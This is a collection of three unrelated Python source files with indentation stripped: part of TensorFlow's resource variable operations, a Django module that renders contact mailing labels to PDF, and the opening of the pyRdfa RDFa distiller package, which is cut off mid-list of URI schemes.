with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_min(sparse_delta, use_locking,
name)
def scatter_mul(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_mul(sparse_delta, use_locking,
name)
def scatter_div(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_div(sparse_delta, use_locking,
name)
def scatter_update(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).scatter_update(sparse_delta, use_locking, name)
def batch_scatter_update(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).batch_scatter_update(sparse_delta, use_locking, name)
def scatter_nd_sub(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_sub(indices, updates, name)
def scatter_nd_add(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_add(indices, updates, name)
def scatter_nd_update(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).scatter_nd_update(indices, updates, name)
def scatter_nd_max(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_max(indices, updates, name)
def scatter_nd_min(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_min(indices, updates, name)
@property
def op(self):
"""The op for this variable."""
return self._parent_op
@ops.RegisterGradient("ReadVariableOp")
def _ReadGrad(_, grad):
"""Gradient for read op."""
return grad
def variable_shape(handle, out_type=dtypes.int32):
handle_data = get_eager_safe_handle_data(handle)
if handle_data is None or not handle_data.is_set:
return gen_resource_variable_ops.variable_shape(handle, out_type=out_type)
shape_proto = handle_data.shape_and_type[0].shape
if shape_proto.unknown_rank or any(x.size == -1 for x in shape_proto.dim):
return gen_resource_variable_ops.variable_shape(handle, out_type=out_type)
return constant_op.constant([x.size for x in shape_proto.dim], dtype=out_type)
@ops.RegisterGradient("ResourceGather")
def _GatherGrad(op, grad):
"""Gradient for gather op."""
# Build appropriately shaped IndexedSlices
handle = op.inputs[0]
indices = op.inputs[1]
params_shape = variable_shape(handle)
size = array_ops.expand_dims(array_ops.size(indices), 0)
values_shape = array_ops.concat([size, params_shape[1:]], 0)
values = array_ops.reshape(grad, values_shape)
indices = array_ops.reshape(indices, size)
return (indexed_slices.IndexedSlices(values, indices, params_shape), None)
def _to_proto_fn(v, export_scope=None):
"""Converts Variable and ResourceVariable to VariableDef for collections."""
return v.to_proto(export_scope=export_scope)
def _from_proto_fn(v, import_scope=None):
"""Creates Variable or ResourceVariable from VariableDef as needed."""
if v.is_resource:
return ResourceVariable.from_proto(v, import_scope=import_scope)
return variables.Variable.from_proto(v, import_scope=import_scope)
ops.register_proto_function(
ops.GraphKeys.GLOBAL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.TRAINABLE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.MOVING_AVERAGE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.LOCAL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.MODEL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.GLOBAL_STEP,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.METRIC_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
@tf_export("__internal__.ops.is_resource_variable", v1=[])
def is_resource_variable(var):
""""Returns True if `var` is to be considered a ResourceVariable."""
return isinstance(var, BaseResourceVariable) or hasattr(
var, "_should_act_as_resource_variable")
def copy_to_graph_uninitialized(var):
"""Copies an existing variable to a new graph, with no initializer."""
# Like ResourceVariable.__deepcopy__, but does not set an initializer on the
# new variable.
# pylint: disable=protected-access
new_variable = UninitializedVariable(
trainable=var.trainable,
constraint=var._constraint,
shape=var.shape,
dtype=var.dtype,
name=var._shared_name,
synchronization=var.synchronization,
aggregation=var.aggregation,
extra_handle_data=var.handle)
new_variable._maybe_initialize_trackable()
# pylint: enable=protected-access
return new_variable
ops.NotDifferentiable("Assert")
ops.NotDifferentiable("VarIsInitializedOp")
ops.NotDifferentiable("VariableShape")
class VariableSpec(tensor_spec.DenseSpec):
"""Describes a tf.Variable."""
__slots__ = ["trainable"]
value_type = property(lambda self: BaseResourceVariable)
def __init__(self, shape, dtype=dtypes.float32,
name=None, trainable=True):
super(VariableSpec, self).__init__(shape, dtype=dtype, name=name)
self.trainable = trainable
def _to_components(self, value):
raise NotImplementedError
def _from_components(self, components):
raise NotImplementedError
def _from_compatible_tensor_list(self, tensor_list):
assert len(tensor_list) == 1
return tensor_list[0]
def __tf_tracing_type__(self, signature_context):
return signature_context.make_reference_type(self, id(self))
_pywrap_utils.RegisterType("VariableSpec", VariableSpec)
def write_object_proto_for_resource_variable(resource_variable, proto, options):
"""Writes additional information of the variable into the SavedObject proto.
This allows users to define a `hook` to provide extra information of the
variable to the SavedObject.
For example, DistritubtedVariable class would fill in components in the
distributed context.
Args:
resource_variable: A `ResourceVariable` or `DistributedValue` that has the
information to be saved into the proto.
proto: `SavedObject` proto to update.
options: A `SaveOption` instance that configures save behavior.
"""
proto.variable.SetInParent()
if not resource_variable.name.endswith(":0"):
raise ValueError(f"Cowardly refusing to save variable "
f"{resource_variable.name} because of "
f"unexpected suffix in the name (':0') "
f"which won't be restored.")
proto.variable.name = meta_graph._op_name(resource_variable.name) # pylint: disable=protected-access
proto.variable.trainable = resource_variable.trainable
proto.variable.dtype = resource_variable.dtype.as_datatype_enum
proto.variable.synchronization = resource_variable.synchronization.value
proto.variable.aggregation = resource_variable.aggregation.value
proto.variable.shape.CopyFrom(resource_variable.shape.as_proto())
if options.experimental_variable_policy._save_variable_devices( # pylint: disable=protected-access
):
if hasattr(resource_variable, "device"):
proto.variable.device = resource_variable.device
|
the-stack_0_26016
|
# -*- coding: utf-8 -*-
#
# djangoplicity-contacts
# Copyright (c) 2007-2011, European Southern Observatory (ESO)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the European Southern Observatory nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL ESO BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE
#
"""
Module for generating labels in PDF documents. Relying on trml2pdf to generate the
PDFs. Works together with the ``Label`` class to define different labels.
Uses base templates to define a specific types of label paper with a standard
layout of each label. The layout of each label can be overwritten. The standard
labels assumes you are passing ``Contact`` models
Usage::
>>> from djangoplicity.contacts.labels import LabelRender
>>> from djangoplicity.contacts.models import Contact
>>> queryset = Contacts.objects.all()[:100]
>>> l = LabelRender( 'a4-l7165' )
# Write a PDF file
>>> l.render_file( queryset, 'somefilename.pdf', outputdir='/path/to/somewhere/', extra_context={ 'title' : 'Some Title', 'author' : 'Some Author' } )
# Get a HTTP response with PDF file instead
>>> l.render_http_response( queryset, 'somefilename.pdf', extra_context={ 'title' : 'Some Title', 'author' : 'Some Author' } )
# Override default template layout and repeat each label 4 times.
>>> style = '{% include "contacts/labels/cool_label_style.rml" %}'
>>> template = '{% include "contacts/labels/cool_label.rml" %}'
>>> l = LabelRender( 'a4-l7165', label_template=template, style=style, repeat=4 )
# in the label template you have access to the variable ``obj`` which contains the
# current object instance for the label you are rendering:
>>> template = '...{{obj.email}}...'
When override templates, instead of including a template in a file, you can also just
directly define the django template in a string. This is used by the ``Label`` model to
define custom labels.
"""
from django.template import Context, Template
from django.utils.encoding import smart_str
from django.http import HttpResponse
import math
import os
try:
import trml2pdf
except ImportError:
trml2pdf = None
# Variable defines all possible paper types. For each paper type following properties
# are defined:
# * ``labels_no``: Number of labels per page
# * ``template``: The RML template for the paper type
# * ``label_template``: The default RML template file for layout of one label (the
# template file is included once for each label in template)
# * ``label_template_style``: The default extra RML stylesheet which may be needed
# by label_template
LABEL_PAPER = {
'a4-l7163': {
'title': 'A4 (L7163 - 99.1x38.1)',
'labels_no': 14,
'template': "contacts/labels/a4-l7163.rml",
'label_template': 'contacts/labels/standard_label_small.rml',
'label_template_style': 'contacts/labels/standard_label_small_style.rml',
},
'a4-l7165': {
'title': 'A4 (L7165 - 99.1x67.7)',
'labels_no': 8,
'template': "contacts/labels/a4-l7165.rml",
'label_template': 'contacts/labels/standard_label.rml',
'label_template_style': 'contacts/labels/standard_label_style.rml',
},
'us-letter-5162': {
'title': 'US Letter (5162 - 102x34)',
'labels_no': 14,
'template': "contacts/labels/usletter-5162.rml",
'label_template': 'contacts/labels/standard_label_small.rml',
'label_template_style': 'contacts/labels/standard_label_small_style.rml',
},
}
# Label paper choices for use as choices in a django field
LABEL_PAPER_CHOICES = tuple( [( k, v['title'] ) for k, v in LABEL_PAPER.items()] )
class LabelRender( object ):
"""
Class that renders labels from a queryset.
"""
def __init__( self, paper, label_template=None, style=None, repeat=1 ):
"""
Initialise template render.
* ``paper``: a key in LAPER_PAPER (required)
* ``label_template``: string with a django template to use instead of the default label template (optional)
* ``style``: string with a django template to use instead of the default label template style (optional)
* ``repeat``: the number of times to repeat each object in the query set.
"""
# Ensure trml2pdf is installed
if trml2pdf is None:
raise Exception( "Cannot generate PDF - trml2pdf is not installed." )
# Check paper type
if paper not in LABEL_PAPER:
raise Exception( "Label paper %s is not defined." )
# The render works by generating a template which looks like this:
# {% extends "contacts/labels/<papertype>.rml" %}
# {% block label_style %}<label_template_style>{% endblock %}
# {% block label0 %}<label_template>{% endblock %}
# {% block label1 %}<label_template>{% endblock %}
# ...
# {% block label<label_no-1> %}<label_template>{% endblock %}
#
# Hence, the <papertype>.rml template must naturally define these blocks:
# 1 block for the label_style
# X blocks for the individual labels on a page.
self.label_paper = LABEL_PAPER[paper]
self.document_template = """{%% extends "%s" %%}""" % self.label_paper['template']
if style:
self.document_template += u"""{%% block label_style %%}%s{%% endblock %%}""" % style
if label_template:
for i in range( self.label_paper['labels_no'] ):
self.document_template += u"""{%% block label%s %%}%s{%% endblock %%}""" % ( i, label_template )
self.document_template = Template( self.document_template )
self.repeat = repeat if int(repeat) > 0 else 1
def render( self, queryset, filename, extra_context={} ):
"""
Render PDF.
It is possible to simply extra context variables to the
templates via extra_context. However, the following keys
are reserved:
* filename
* label_template
* label_template_style
* objects
For instance most templates support these extra variables:
* title
* label_template
"""
# Repeat objects in queryset if needed.
if self.repeat > 1:
new_queryset = []
for obj in queryset:
new_queryset += [obj] * self.repeat
queryset = new_queryset
# Split queryset into lists of pages
list_count = int( math.ceil( float( len( queryset ) ) / self.label_paper['labels_no'] ) )
page_objects = []
for i in range( list_count ):
page_objects.append( queryset[i * self.label_paper['labels_no']:( i + 1 ) * self.label_paper['labels_no']] )
if len( page_objects[-1] ) != self.label_paper['labels_no']:
page_objects[-1] = page_objects[-1] + [None] * ( self.label_paper['labels_no'] - len( page_objects[-1] ) )
# Generate context
from django.conf import settings
extra_context.update( {
'filename': filename,
'label_template': self.label_paper['label_template'],
'label_template_style': self.label_paper['label_template_style'],
'objects': page_objects,
'MEDIA_ROOT': settings.MEDIA_ROOT,
'STATIC_ROOT': settings.STATIC_ROOT,
} )
# Generate RML template
rmldoc = self.document_template.render( Context( extra_context ) )
# Generate PDF
return trml2pdf.parseString( smart_str( rmldoc ) )
def render_http_response( self, queryset, filename, response=None, extra_context={} ):
"""
Write rendered PDF to a HttpResponse object.
"""
if response is None:
response = HttpResponse( content_type='application/pdf' )
response['Content-Disposition'] = 'attachment; filename=%s' % filename
response.write( self.render( queryset, filename, extra_context=extra_context ) )
return response
def render_file( self, queryset, filename, outputdir=None, extra_context={} ):
"""
Write rendered PDF to a file in a output directory.
"""
if outputdir is None:
outputdir = os.getcwd()
if not os.path.exists( outputdir ):
raise Exception( "Output directory does not exists" )
fullpath = os.path.join( outputdir, filename )
f = open( fullpath, 'w' )
f.write( self.render( queryset, filename, extra_context=extra_context ) )
f.close()
return fullpath
|
the-stack_0_26017
|
# -*- coding: utf-8 -*-
"""
RDFa 1.1 parser, also referred to as a “RDFa Distiller”. It is
deployed, via a CGI front-end, on the U{W3C RDFa 1.1 Distiller page<http://www.w3.org/2012/pyRdfa/>}.
For details on RDFa, the reader should consult the U{RDFa Core 1.1<http://www.w3.org/TR/rdfa-core/>}, U{XHTML+RDFa1.1<http://www.w3.org/TR/2010/xhtml-rdfa>}, and the U{RDFa 1.1 Lite<http://www.w3.org/TR/rdfa-lite/>} documents.
The U{RDFa 1.1 Primer<http://www.w3.org/TR/owl2-primer/>} may also prove helpful.
This package can also be downloaded U{from GitHub<https://github.com/RDFLib/pyrdfa3>}. The
distribution also includes the CGI front-end and a separate utility script to be run locally.
Note that this package is an updated version of a U{previous RDFa distiller<http://www.w3.org/2007/08/pyRdfa>} that was developed
for RDFa 1.0. Although it reuses large portions of that code, it has been quite thoroughly rewritten, hence put in a completely
different project. (The version numbering has been continued, though, to avoid any kind of misunderstandings. This version has version numbers "3.0.0" or higher.)
(Simple) Usage
==============
From a Python file, expecting a Turtle output::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename')
Other output formats are also possible. E.g., to produce RDF/XML output, one could use::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename', outputFormat='pretty-xml')
It is also possible to embed an RDFa processing. Eg, using::
from pyRdfa import pyRdfa
graph = pyRdfa().graph_from_source('filename')
returns an RDFLib.Graph object instead of a serialization thereof. See the the description of the
L{pyRdfa class<pyRdfa.pyRdfa>} for further possible entry points details.
There is also, as part of this module, a L{separate entry for CGI calls<processURI>}.
Return (serialization) formats
------------------------------
The package relies on RDFLib. By default, it relies therefore on the serializers coming with the local RDFLib distribution. However, there has been some issues with serializers of older RDFLib releases; also, some output formats, like JSON-LD, are not (yet) part of the standard RDFLib distribution. A companion package, called pyRdfaExtras, is part of the download, and it includes some of those extra serializers. The extra format (not part of the RDFLib core) is U{JSON-LD<http://json-ld.org/spec/latest/json-ld-syntax/>}, whose 'key' is 'json', when used in the 'parse' method of an RDFLib graph.
Options
=======
The package also implements some optional features that are not part of the RDFa recommendations. At the moment these are:
- possibility for plain literals to be normalized in terms of white spaces. Default: false. (The RDFa specification requires keeping the white spaces and leave applications to normalize them, if needed)
- inclusion of embedded RDF: Turtle content may be enclosed in a C{script} element and typed as C{text/turtle}, U{defined by the RDF Working Group<http://www.w3.org/TR/turtle/>}. Alternatively, some XML dialects (e.g., SVG) allows the usage of RDF/XML as part of their core content to define metadata in RDF. For both of these cases pyRdfa parses these serialized RDF content and adds the resulting triples to the output Graph. Default: true.
- extra, built-in transformers are executed on the DOM tree prior to RDFa processing (see below). These transformers can be provided by the end user.
Options are collected in an instance of the L{Options} class and may be passed to the processing functions as an extra argument. E.g., to allow the inclusion of embedded content::
from pyRdfa.options import Options
options = Options(embedded_rdf=True)
print pyRdfa(options=options).rdf_from_source('filename')
See the description of the L{Options} class for the details.
Host Languages
==============
RDFa 1.1. Core is defined for generic XML; there are specific documents to describe how the generic specification is applied to
XHTML and HTML5.
pyRdfa makes an automatic switch among these based on the content type of the source as returned by an HTTP request. The following are the
possible host languages:
- if the content type is C{text/html}, the content is HTML5
- if the content type is C{application/xhtml+xml} I{and} the right DTD is used, the content is XHTML1
- if the content type is C{application/xhtml+xml} and no or an unknown DTD is used, the content is XHTML5
- if the content type is C{application/svg+xml}, the content type is SVG
- if the content type is C{application/atom+xml}, the content type is SVG
- if the content type is C{application/xml} or C{application/xxx+xml} (but 'xxx' is not 'atom' or 'svg'), the content type is XML
If local files are used, pyRdfa makes a guess on the content type based on the file name suffix: C{.html} is for HTML5, C{.xhtml} for XHTML1, C{.svg} for SVG, anything else is considered to be general XML. Finally, the content type may be set by the caller when initializing the L{pyRdfa class<pyRdfa.pyRdfa>}.
Beyond the differences described in the RDFa specification, the main difference is the parser used to parse the source. In the case of HTML5, pyRdfa uses an U{HTML5 parser<http://code.google.com/p/html5lib/>}; for all other cases the simple XML parser, part of the core Python environment, is used. This may be significant in the case of erronuous sources: indeed, the HTML5 parser may do adjustments on
the DOM tree before handing it over to the distiller. Furthermore, SVG is also recognized as a type that allows embedded RDF in the form of RDF/XML.
See the variables in the L{host} module if a new host language is added to the system. The current host language information is available for transformers via the option argument, too, and can be used to control the effect of the transformer.
Vocabularies
============
RDFa 1.1 has the notion of vocabulary files (using the C{@vocab} attribute) that may be used to expand the generated RDF graph. Expansion is based on some very simply RDF Schema and OWL statements on sub-properties and sub-classes, and equivalences.
pyRdfa implements this feature, although it does not do this by default. The extra C{vocab_expansion} parameter should be used for this extra step, for example::
from pyRdfa.options import Options
options = Options(vocab_expansion=True)
print pyRdfa(options=options).rdf_from_source('filename')
The triples in the vocabulary files themselves (i.e., the small ontology in RDF Schema and OWL) are removed from the result, leaving the inferred property and type relationships only (additionally to the “core” RDF content).
Vocabulary caching
------------------
By default, pyRdfa uses a caching mechanism instead of fetching the vocabulary files each time their URI is met as a C{@vocab} attribute value. (This behavior can be switched off setting the C{vocab_cache} option to false.)
Caching happens in a file system directory. The directory itself is determined by the platform the tool is used on, namely:
- On Windows, it is the C{pyRdfa-cache} subdirectory of the C{%APPDATA%} environment variable
- On MacOS, it is the C{~/Library/Application Support/pyRdfa-cache}
- Otherwise, it is the C{~/.pyRdfa-cache}
This automatic choice can be overridden by the C{PyRdfaCacheDir} environment variable.
Caching can be set to be read-only, i.e., the setup might generate the cache files off-line instead of letting the tool writing its own cache when operating, e.g., as a service on the Web. This can be achieved by making the cache directory read only.
If the directories are neither readable nor writable, the vocabulary files are retrieved via HTTP every time they are hit. This may slow down processing, it is advised to avoid such a setup for the package.
The cache includes a separate index file and a file for each vocabulary file. Cache control is based upon the C{EXPIRES} header of a vocabulary file’s HTTP return header: when first seen, this data is stored in the index file and controls whether the cache has to be renewed or not. If the HTTP return header does not have this entry, the date is artificially set ot the current date plus one day.
(The cache files themselves are dumped and loaded using U{Python’s built in cPickle package<http://docs.python.org/release/2.7/library/pickle.html#module-cPickle>}. These are binary files. Care should be taken if they are managed by CVS: they must be declared as binary files when adding them to the repository.)
RDFa 1.1 vs. RDFa 1.0
=====================
Unfortunately, RDFa 1.1 is I{not} fully backward compatible with RDFa 1.0, meaning that, in a few cases, the triples generated from an RDFa 1.1 source are not the same as for RDFa 1.0. (See the separate U{section in the RDFa 1.1 specification<http://www.w3.org/TR/rdfa-core/#major-differences-with-rdfa-syntax-1.0>} for some further details.)
This distiller’s default behavior is RDFa 1.1. However, if the source includes, in the top element of the file (e.g., the C{html} element) a C{@version} attribute whose value contains the C{RDFa 1.0} string, then the distiller switches to a RDFa 1.0 mode. (Although the C{@version} attribute is not required in RDFa 1.0, it is fairly commonly used.) Similarly, if the RDFa 1.0 DTD is used in the XHTML source, it will be taken into account (a very frequent setup is that an XHTML file is defined with that DTD and is served as text/html; pyRdfa will consider that file as XHTML5, i.e., parse it with the HTML5 parser, but interpret the RDFa attributes under the RDFa 1.0 rules).
Transformers
============
The package uses the concept of 'transformers': the parsed DOM tree is possibly
transformed I{before} performing the real RDFa processing. This transformer structure makes it possible to
add additional 'services' without distoring the core code of RDFa processing.
A transformer is a function with three arguments:
- C{node}: a DOM node for the top level element of the DOM tree
- C{options}: the current L{Options} instance
- C{state}: the current L{ExecutionContext} instance, corresponding to the top level DOM Tree element
The function may perform any type of change on the DOM tree; the typical behaviour is to add or remove attributes on specific elements. Some transformations are included in the package and can be used as examples; see the L{transform} module of the distribution. These are:
- The C{@name} attribute of the C{meta} element is copied into a C{@property} attribute of the same element
- Interpreting the 'openid' references in the header. See L{transform.OpenID} for further details.
- Implementing the Dublin Core dialect to include DC statements from the header. See L{transform.DublinCore} for further details.
The user of the package may refer add these transformers to L{Options} instance. Here is a possible usage with the “openid” transformer added to the call::
from pyRdfa.options import Options
from pyRdfa.transform.OpenID import OpenID_transform
options = Options(transformers=[OpenID_transform])
print pyRdfa(options=options).rdf_from_source('filename')
@summary: RDFa parser (distiller)
@requires: Python version 2.5 or up; 2.7 is preferred
@requires: U{RDFLib<http://rdflib.net>}; version 3.X is preferred.
@requires: U{html5lib<http://code.google.com/p/html5lib/>} for the HTML5 parsing.
@requires: U{httpheader<http://deron.meranda.us/python/httpheader/>}; however, a small modification had to make on the original file, so for this reason and to make distribution easier this module (single file) is added to the package.
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<a href="http://www.w3.org/People/Ivan/">}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<href="http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231">}
@copyright: W3C
@var builtInTransformers: List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
@var CACHE_DIR_VAR: Environment variable used to define cache directories for RDFa vocabularies in case the default setting does not work or is not appropriate.
@var rdfa_current_version: Current "official" version of RDFa that this package implements by default. This can be changed at the invocation of the package
@var uri_schemes: List of registered (or widely used) URI schemes; used for warnings...
"""
"""
$Id: __init__.py,v 1.91 2013-10-16 11:48:54 ivan Exp $
"""
__version__ = "3.4.3"
__author__ = 'Ivan Herman'
__contact__ = 'Ivan Herman, [email protected]'
__license__ = 'W3C® SOFTWARE NOTICE AND LICENSE, http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231'
import sys
PY3 = (sys.version_info[0] >= 3)
if PY3 :
from io import StringIO
else :
from StringIO import StringIO
import os
import xml.dom.minidom
if PY3 :
from urllib.parse import urlparse
else :
from urlparse import urlparse
import rdflib
from rdflib import URIRef
from rdflib import Literal
from rdflib import BNode
from rdflib import Namespace
if rdflib.__version__ >= "3.0.0" :
from rdflib import RDF as ns_rdf
from rdflib import RDFS as ns_rdfs
from rdflib import Graph
else :
from rdflib.RDFS import RDFSNS as ns_rdfs
from rdflib.RDF import RDFNS as ns_rdf
from rdflib.Graph import Graph
import logging
logger = logging.getLogger(__name__)
# Namespace, in the RDFLib sense, for the rdfa vocabulary
ns_rdfa = Namespace("http://www.w3.org/ns/rdfa#")
from .extras.httpheader import acceptable_content_type, content_type
from .transform.prototype import handle_prototypes
# Vocabulary terms for vocab reporting
RDFA_VOCAB = ns_rdfa["usesVocabulary"]
# Namespace, in the RDFLib sense, for the XSD Datatypes
ns_xsd = Namespace('http://www.w3.org/2001/XMLSchema#')
# Namespace, in the RDFLib sense, for the distiller vocabulary, used as part of the processor graph
ns_distill = Namespace("http://www.w3.org/2007/08/pyRdfa/vocab#")
debug = False
#########################################################################################################
# Exception/error handling. Essentially, all the different exceptions are re-packaged into
# separate exception class, to allow for an easier management on the user level
class RDFaError(Exception) :
"""Superclass exceptions representing error conditions defined by the RDFa 1.1 specification.
It does not add any new functionality to the
Exception class."""
def __init__(self, msg) :
self.msg = msg
Exception.__init__(self)
class FailedSource(RDFaError) :
"""Raised when the original source cannot be accessed. It does not add any new functionality to the
Exception class."""
def __init__(self, msg, http_code = None) :
self.msg = msg
self.http_code = http_code
RDFaError.__init__(self, msg)
class HTTPError(RDFaError) :
"""Raised when HTTP problems are detected. It does not add any new functionality to the
Exception class."""
def __init__(self, http_msg, http_code) :
self.msg = http_msg
self.http_code = http_code
RDFaError.__init__(self,http_msg)
class ProcessingError(RDFaError) :
"""Error found during processing. It does not add any new functionality to the
Exception class."""
pass
class pyRdfaError(Exception) :
"""Superclass exceptions representing error conditions outside the RDFa 1.1 specification."""
pass
# Error and Warning RDFS classes
RDFA_Error = ns_rdfa["Error"]
RDFA_Warning = ns_rdfa["Warning"]
RDFA_Info = ns_rdfa["Information"]
NonConformantMarkup = ns_rdfa["DocumentError"]
UnresolvablePrefix = ns_rdfa["UnresolvedCURIE"]
UnresolvableReference = ns_rdfa["UnresolvedCURIE"]
UnresolvableTerm = ns_rdfa["UnresolvedTerm"]
VocabReferenceError = ns_rdfa["VocabReferenceError"]
PrefixRedefinitionWarning = ns_rdfa["PrefixRedefinition"]
FileReferenceError = ns_distill["FileReferenceError"]
HTError = ns_distill["HTTPError"]
IncorrectPrefixDefinition = ns_distill["IncorrectPrefixDefinition"]
IncorrectBlankNodeUsage = ns_distill["IncorrectBlankNodeUsage"]
IncorrectLiteral = ns_distill["IncorrectLiteral"]
# Error message texts
err_no_blank_node = "Blank node in %s position is not allowed; ignored"
err_redefining_URI_as_prefix = "'%s' a registered or an otherwise used URI scheme, but is defined as a prefix here; is this a mistake? (see, eg, http://en.wikipedia.org/wiki/URI_scheme or http://www.iana.org/assignments/uri-schemes.html for further information for most of the URI schemes)"
err_xmlns_deprecated = "The usage of 'xmlns' for prefix definition is deprecated; please use the 'prefix' attribute instead (definition for '%s')"
err_bnode_local_prefix = "The '_' local CURIE prefix is reserved for blank nodes, and cannot be defined as a prefix"
err_col_local_prefix = "The character ':' is not valid in a CURIE Prefix, and cannot be used in a prefix definition (definition for '%s')"
err_missing_URI_prefix = "Missing URI in prefix declaration for '%s' (in '%s')"
err_invalid_prefix = "Invalid prefix declaration '%s' (in '%s')"
err_no_default_prefix = "Default prefix cannot be changed (in '%s')"
err_prefix_and_xmlns = "@prefix setting for '%s' overrides the 'xmlns:%s' setting; may be a source of problem if same file is run through RDFa 1.0"
err_non_ncname_prefix = "Non NCNAME '%s' in prefix definition (in '%s'); ignored"
err_absolute_reference = "CURIE Reference part contains an authority part: %s (in '%s'); ignored"
err_query_reference = "CURIE Reference query part contains an unauthorized character: %s (in '%s'); ignored"
err_fragment_reference = "CURIE Reference fragment part contains an unauthorized character: %s (in '%s'); ignored"
err_lang = "There is a problem with language setting; either both xml:lang and lang used on an element with different values, or, for (X)HTML5, only xml:lang is used."
err_URI_scheme = "Unusual URI scheme used in <%s>; may that be a mistake, e.g., resulting from using an undefined CURIE prefix or an incorrect CURIE?"
err_illegal_safe_CURIE = "Illegal safe CURIE: %s; ignored"
err_no_CURIE_in_safe_CURIE = "Safe CURIE is used, but the value does not correspond to a defined CURIE: [%s]; ignored"
err_undefined_terms = "'%s' is used as a term, but has not been defined as such; ignored"
err_non_legal_CURIE_ref = "Relative URI is not allowed in this position (or not a legal CURIE reference) '%s'; ignored"
err_undefined_CURIE = "Undefined CURIE: '%s'; ignored"
err_prefix_redefinition = "Prefix '%s' (defined in the initial RDFa context or in an ancestor) is redefined"
err_unusual_char_in_URI = "Unusual character in uri: %s; possible error?"
#############################################################################################
from .state import ExecutionContext
from .parse import parse_one_node
from .options import Options
from .transform import top_about, empty_safe_curie, vocab_for_role
from .utils import URIOpener
from .host import HostLanguage, MediaTypes, preferred_suffixes, content_to_host_language
# Environment variable used to characterize cache directories for RDFa vocabulary files.
CACHE_DIR_VAR = "PyRdfaCacheDir"
# current "official" version of RDFa that this package implements. This can be changed at the invocation of the package
rdfa_current_version = "1.1"
# I removed schemes that would not appear as a prefix anyway, like iris.beep
# http://en.wikipedia.org/wiki/URI_scheme seems to be a good source of information
# as well as http://www.iana.org/assignments/uri-schemes.html
# There are some overlaps here, but better more than not enough...
# This comes from wikipedia
registered_iana_schemes = [
"aaa","aaas","acap","cap","cid","crid","data","dav","dict","dns","fax","file", "ftp","geo","go",
"gopher","h323","http","https","iax","icap","im","imap","info","ipp","iris","ldap", "lsid",
"mailto","mid","modem","msrp","msrps", "mtqp", "mupdate","news","nfs","nntp","opaquelocktoken",
"pop","pres", "prospero","rstp","rsync", "service","shttp","sieve","sip","sips", "sms", "snmp", "soap", "tag",
"tel","telnet", "tftp", "thismessage","tn3270","tip","tv","urn","vemmi","wais","ws", "wss", "xmpp"
]
# This comes from wikipedia, too
unofficial_common = [
"about", "adiumxtra", "aim", "apt", "afp", "aw", "bitcoin", "bolo", "callto", "chrome", "coap",
"content", "cvs", "doi", "ed2k", "facetime", "feed", "finger", "fish", "git", "gg",
"gizmoproject", "gtalk", "irc", "ircs", "irc6", "itms", "jar", "javascript",
"keyparc", "lastfm", "ldaps", "magnet", "maps", "market", "message", "mms",
"msnim", "mumble", "mvn", "notes", "palm", "paparazzi", "psync", "rmi",
"secondlife", "sgn", "skype", "spotify", "ssh", "sftp", "smb", "soldat",
